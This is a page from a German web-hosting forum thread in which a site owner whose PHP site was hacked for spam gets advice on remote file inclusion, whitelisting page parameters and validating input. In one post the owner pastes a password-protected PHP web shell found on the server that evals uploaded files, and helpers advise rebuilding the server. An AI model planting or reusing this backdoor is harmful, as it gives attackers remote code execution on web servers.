Seite 3 von 4 ErsteErste 1234 LetzteLetzte
Ergebnis 21 bis 30 von 34

Thema: Spam Mails ohne Ende obwohl Kontaktformular offline

  1. #21
    Pöhser Purche Avatar von homer
    Registriert seit
    18.07.2005
    Ort
    Deep Down Oberfranken
    Beiträge
    2.939

    Standard

    Zitat Zitat von kojak Beitrag anzeigen
    Ich dachte immer die PHP Dateien, die von fremden
    Servern includet werden, werden auch nur auf dem Server ausgeführt.
    Ja, wenn sie dort durch den PHP-Parser gejagt werden. Was bei .txt-Dateien normalerweise nicht der Fall ist.

    Zitat Zitat von kojak Beitrag anzeigen
    Ich brauche dringenst dringens Hilfe das ich es Safe bekomm.
    Habt Ihr noch irgendwelche Tips wie ich es ersteinmal sicher bekomme.
    Mach einfach ein Array mit erlaubten Seiten und prüfe die übergebenen Werte dagegen:
    Code:
    $erlaubteSeiten = array('seite1','seite2','seite3','pfad/seite4');
    if (in_array($_REQUEST['site'],$erlaubteSeiten)) {
      include($_REQUEST['site'].'php');
    } else {
      include('defaultseite.php');
    }
    Zitat Zitat von kojak Beitrag anzeigen
    Was hab ich grad gelesen. Root Kit..watt datt denn nu schon wieder.
    Ich hab nur geschrieben, dass versucht wurde, das Teil zu installieren. Ob die das geschafft haben ist eine andere Sache. Schau Dir doch mal meinen Link oben an, da steht auch, wie man r0nin wieder los wird.

    Sarkasmus. Weil es illegal ist, dumme Leute zu schlagen.

  2. #22
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard Danke

    Danke dir.
    Kannst du mir noch sagen wie es ausschaut wenn ich url´s include
    die aus der Datebank kommen und nicht als Get Var vorhanden sind?
    Das ist doch dann unbedenktlich oder?

  3. #23
    Pöhser Purche Avatar von homer
    Registriert seit
    18.07.2005
    Ort
    Deep Down Oberfranken
    Beiträge
    2.939

    Standard

    Zitat Zitat von kojak Beitrag anzeigen
    Kannst du mir noch sagen wie es ausschaut wenn ich url´s include die aus der Datebank kommen und nicht als Get Var vorhanden sind? Das ist doch dann unbedenktlich oder?
    Wenn Dir die URLs nicht per SQL-Injection untergeschoben wurden sollte das unfallfrei funktionieren. Dann ist halt zu beachten, wer alles URLs in die Datenbank einbauen darf. Wenn das wieder eine öffentliche Sache ist, lass die Finger davon.

    Sarkasmus. Weil es illegal ist, dumme Leute zu schlagen.

  4. #24
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard hi

    Sorry..hab immer wieder etwas neues.
    Ich hab mich zwar schon etwas belesen aber bin mir der vorgehensweise
    unsicher.

    Wenn ich nun z.B. andere GET Variablen übermittel, müssen diese dann
    auch immer überprüft werden?
    Diese GET Variablen sagen zum Beispiel nur aus ob ein Iframe
    genutzt werden soll oder nicht.
    Beispiel: meineseite.php?content=iframe

    Ich finde leider keine Antwort auf diese Frage, möchte auch nicht
    für jede ,,Kleinigkeit,, das Forum oder besser gesagt dich als meinen persöhnlichen
    Helfer ausnutzen.

  5. #25
    Pöhser Purche Avatar von homer
    Registriert seit
    18.07.2005
    Ort
    Deep Down Oberfranken
    Beiträge
    2.939

    Standard

    Zitat Zitat von Kodi Beitrag anzeigen
    Wenn ich nun z.B. andere GET Variablen übermittel, müssen diese dannauch immer überprüft werden?
    [paranoia]Übergebene Werte müssen immer überprüft werden.[/paranoia]
    Das gilt nicht nur für PHP, sondern für alle Programme, die Nutzereingaben verarbeiten. Da gibt es lustige Beispiele, was passiert wenn man das nicht tut.

    Schau Dir mal [Link nur für registrierte Mitglieder sichtbar. ] an, besonders das Kapitel zur [Link nur für registrierte Mitglieder sichtbar. ]. Wenn man allerdings die Werte aus einem bestimmten Bereich erwartet finde ich es besser, gegen die erlaubten Werde zu prüfen (siehe den PHP-Code wieter oben).

    Sarkasmus. Weil es illegal ist, dumme Leute zu schlagen.

  6. #26
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard Kodi

    Also gilt das für alle Get Variablen!?

    Erstmal muss ich sagen, das es mir leid tut immer so ,,dumme,, Fragen
    stellen zu müssen die du evt. schon beantwortet hast.

    Also alle Get Vars müssen überprüft werden auch wenn Sie nur
    mit anderen Strings verglichen werden?
    Z.B.

    if($_GET['content'] == 'iframe'){
    $target = $_GET['content'];
    }

    Und ich hab noch etwas. Ich hab folgende Dateien auf meinem Server
    entdeckt. Kannst du damit was anfangen. Folgender Code steht z.B. in
    einer .php Datei.

    Code:
    <?php error_reporting(1);
    global $HTTP_SERVER_VARS; 
    function say($t) { echo "$t\n"; };
    function testdata($t) { say(md5("testdata_$t")); }; 
    echo "<pre>"; 
    testdata('start'); 
    if (md5($_POST["p"])=="aace994xxxxbe965acxxxxx75cd3"){ if ($code =fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); 
    }else{ testdata('f');
     };
     }else{ testdata('pass');
     }; testdata('end'); 
    echo "</pre>";
     ?>
    Gruss
    Kodi
    Geändert von Kodi (14.03.2008 um 00:04 Uhr)

  7. #27
    Registrierte Benutzer Avatar von actro
    Registriert seit
    14.09.2005
    Ort
    Der Tunnel am Ende des Lichts
    Beiträge
    2.960

    Standard

    Etwas mehr Info wäre schön. Wo gefunden? Wie heisst das Ding?

    Ich hab ne recht grosse Exploit-Datenbank, aber so finde ich da nix..
    Quod non est in litteris, non est in munde.

  8. #28
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard hi

    ich hänge einfach mal die Dateien an, falls du dir die Mühe machen willst.

    Es sind verschiedenen php Dateien mit dem Namen.
    ovu.php
    wehi.php
    lijib.php

    dann sind da noch 2 html Dateien drin und eine
    ogaqoso.txt Datei die sowas wie ein Passwort enthällt.
    (zahlen und buchstaben)


    Anhänge gehen hier ja garnicht, ist auch nicht nötig.
    In allen PHP Dateien steht das selbe.

    Wie meinst du wo gefunden?
    Die Dateien waren in verschiedenen Ordnern.
    Geändert von Kodi (14.03.2008 um 00:13 Uhr)

  9. #29
    Registrierte Benutzer Avatar von actro
    Registriert seit
    14.09.2005
    Ort
    Der Tunnel am Ende des Lichts
    Beiträge
    2.960

    Standard

    okay..

    Mach ein Backup Deiner Daten und setze den Server neu auf.
    Näheres dazu [Link nur für registrierte Mitglieder sichtbar. ].

    Alles andere wäre jetzt verantwortungslos.
    Quod non est in litteris, non est in munde.

  10. #30
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard hi

    Das Problem ist das ich kein Root Server hab.
    Das geht über nen Provider.

    Also soll ich die mal darauf hinweisen.
    Ist das aufwändig für die..machen müssten Sie es eh dann.
    Nützt ja nichts.

    Oh Oh Oh.

Seite 3 von 4 ErsteErste 1234 LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen